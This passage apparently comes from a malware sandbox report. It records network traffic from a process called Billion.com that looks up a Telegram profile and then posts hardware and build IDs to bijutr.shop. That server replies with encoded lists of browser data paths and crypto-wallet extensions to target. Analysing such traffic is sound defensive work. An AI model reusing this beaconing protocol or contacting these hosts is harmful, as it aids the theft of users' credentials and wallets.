                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:12 UTC1083OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 30 0d 0a 4d 53 2d 43 56 3a 20 68 6e 61 6e 68 71 46 55 35 30 75 77 6c 6e 49 63 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 31 30 33 33 62 62 63 30 33 63 30 62 63 62 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 66 33 63 4c 59 5a 74 57 55 43 4a 71 41 63 32 53 58 55 68 66 70 6a 5a 33 66 36 65 53 46 4b 64 6c 6d 68 64 33 31 75 6d 37 2f 73 33 47 51 59 34 79 33 62 4a 6a 34 71 7a 42 72 39 34 6e 69 75 51 39 4b 4b 61 52 44 4a 61 76 78 76 6e 37 75 51 65 36 43 72 53 74 31 76 46 51 6d 4d 42 6d 59 48 62 47 68 56 38 4b 71 4a 35 5a 64 4d 79 72 70 77
                                                                                                                                                                                                                                                                                                        Data Ascii: ATH 2 CON\DEVICE 1060MS-CV: hnanhqFU50uwlnIc.2Context: c1033bbc03c0bcb<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAf3cLYZtWUCJqAc2SXUhfpjZ3f6eSFKdlmhd31um7/s3GQY4y3bJj4qzBr94niuQ9KKaRDJavxvn7uQe6CrSt1vFQmMBmYHbGhV8KqJ5ZdMyrpw
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:12 UTC217OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 36 0d 0a 4d 53 2d 43 56 3a 20 68 6e 61 6e 68 71 46 55 35 30 75 77 6c 6e 49 63 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 31 30 33 33 62 62 63 30 33 63 30 62 63 62 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                        Data Ascii: BND 3 CON\WNS 0 196MS-CV: hnanhqFU50uwlnIc.3Context: c1033bbc03c0bcb<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:12 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:12 UTC58INData Raw: 4d 53 2d 43 56 3a 20 7a 4a 39 69 4e 49 58 44 66 30 6d 33 76 54 58 34 2f 6e 41 44 4f 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                        Data Ascii: MS-CV: zJ9iNIXDf0m3vTX4/nADOQ.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                        2192.168.2.64978020.198.119.84443
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:33 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 73 39 74 52 4e 6c 4d 54 56 30 4f 4d 62 4b 67 6c 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 66 65 61 35 63 36 63 61 63 39 61 65 62 39 38 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: CNT 1 CON 305MS-CV: s9tRNlMTV0OMbKgl.1Context: 1fea5c6cac9aeb98
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:33 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:33 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 73 39 74 52 4e 6c 4d 54 56 30 4f 4d 62 4b 67 6c 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 66 65 61 35 63 36 63 61 63 39 61 65 62 39 38 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 66 33 63 4c 59 5a 74 57 55 43 4a 71 41 63 32 53 58 55 68 66 70 6a 5a 33 66 36 65 53 46 4b 64 6c 6d 68 64 33 31 75 6d 37 2f 73 33 47 51 59 34 79 33 62 4a 6a 34 71 7a 42 72 39 34 6e 69 75 51 39 4b 4b 61 52 44 4a 61 76 78 76 6e 37 75 51 65 36 43 72 53 74 31 76 46 51 6d 4d 42 6d 59 48 62 47 68 56 38 4b 71 4a 35 5a 64 4d 79 72 70
                                                                                                                                                                                                                                                                                                        Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: s9tRNlMTV0OMbKgl.2Context: 1fea5c6cac9aeb98<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAf3cLYZtWUCJqAc2SXUhfpjZ3f6eSFKdlmhd31um7/s3GQY4y3bJj4qzBr94niuQ9KKaRDJavxvn7uQe6CrSt1vFQmMBmYHbGhV8KqJ5ZdMyrp
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:33 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 73 39 74 52 4e 6c 4d 54 56 30 4f 4d 62 4b 67 6c 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 66 65 61 35 63 36 63 61 63 39 61 65 62 39 38 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: s9tRNlMTV0OMbKgl.3Context: 1fea5c6cac9aeb98<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:34 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:34 UTC58INData Raw: 4d 53 2d 43 56 3a 20 72 52 33 4b 33 56 70 31 6f 30 6d 64 49 44 34 73 44 41 55 32 33 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                        Data Ascii: MS-CV: rR3K3Vp1o0mdID4sDAU23w.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        3192.168.2.649792149.154.167.994431396C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:39 UTC85OUTGET /k04ael HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: t.me
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:39 UTC511INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:27:39 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                        Content-Length: 12299
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        Set-Cookie: stel_ssid=8910be78ceb6a609bb_9198664535209794300; expires=Wed, 25 Dec 2024 18:27:39 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                        Cache-control: no-store
                                                                                                                                                                                                                                                                                                        X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:39 UTC12299INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6b 30 34 61 65 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @k04ael</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        4192.168.2.649800188.245.216.2054431396C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:41 UTC231OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:42 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:27:42 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        5192.168.2.649806188.245.216.2054431396C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:43 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----3E3OP8QIMOZUAIMOHVS2
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Content-Length: 256
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:43 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 33 45 33 4f 50 38 51 49 4d 4f 5a 55 41 49 4d 4f 48 56 53 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 39 35 43 46 46 32 43 38 35 39 33 33 31 35 38 38 32 31 30 39 39 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 33 45 33 4f 50 38 51 49 4d 4f 5a 55 41 49 4d 4f 48 56 53 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 33 45 33 4f 50 38 51 49 4d 4f 5a 55 41 49 4d 4f 48 56 53 32 2d 2d 0d
                                                                                                                                                                                                                                                                                                        Data Ascii: ------3E3OP8QIMOZUAIMOHVS2Content-Disposition: form-data; name="hwid"595CFF2C85933158821099-a33c7340-61ca------3E3OP8QIMOZUAIMOHVS2Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------3E3OP8QIMOZUAIMOHVS2--
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:44 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:27:44 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:44 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 32 35 39 36 35 34 63 33 62 63 63 37 33 33 30 65 31 39 35 34 63 61 66 64 33 34 35 34 65 63 34 34 7c 31 7c 31 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                        Data Ascii: 3a1|1|1|1|259654c3bcc7330e1954cafd3454ec44|1|1|1|1|0|50000|10


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        6192.168.2.649812188.245.216.2054431396C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:46 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----26XT0RQ16P8QIECB1DTJ
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:46 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 32 36 58 54 30 52 51 31 36 50 38 51 49 45 43 42 31 44 54 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 39 36 35 34 63 33 62 63 63 37 33 33 30 65 31 39 35 34 63 61 66 64 33 34 35 34 65 63 34 34 0d 0a 2d 2d 2d 2d 2d 2d 32 36 58 54 30 52 51 31 36 50 38 51 49 45 43 42 31 44 54 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 32 36 58 54 30 52 51 31 36 50 38 51 49 45 43 42 31 44 54 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                        Data Ascii: ------26XT0RQ16P8QIECB1DTJContent-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------26XT0RQ16P8QIECB1DTJContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------26XT0RQ16P8QIECB1DTJCont
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:47 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:27:46 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:47 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                                                                                                                                                                                                        Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        7192.168.2.649818188.245.216.2054431396C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:48 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----26FU3EKF37QIE37Y5FUS
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:48 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 32 36 46 55 33 45 4b 46 33 37 51 49 45 33 37 59 35 46 55 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 39 36 35 34 63 33 62 63 63 37 33 33 30 65 31 39 35 34 63 61 66 64 33 34 35 34 65 63 34 34 0d 0a 2d 2d 2d 2d 2d 2d 32 36 46 55 33 45 4b 46 33 37 51 49 45 33 37 59 35 46 55 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 32 36 46 55 33 45 4b 46 33 37 51 49 45 33 37 59 35 46 55 53 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                        Data Ascii: ------26FU3EKF37QIE37Y5FUSContent-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------26FU3EKF37QIE37Y5FUSContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------26FU3EKF37QIE37Y5FUSCont
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:49 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:27:49 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:49 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                                                                        Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        8192.168.2.649824188.245.216.2054431396C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:27:50 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----7YCBIE37YCBAIEC26FCB
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Content-Length: 332
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
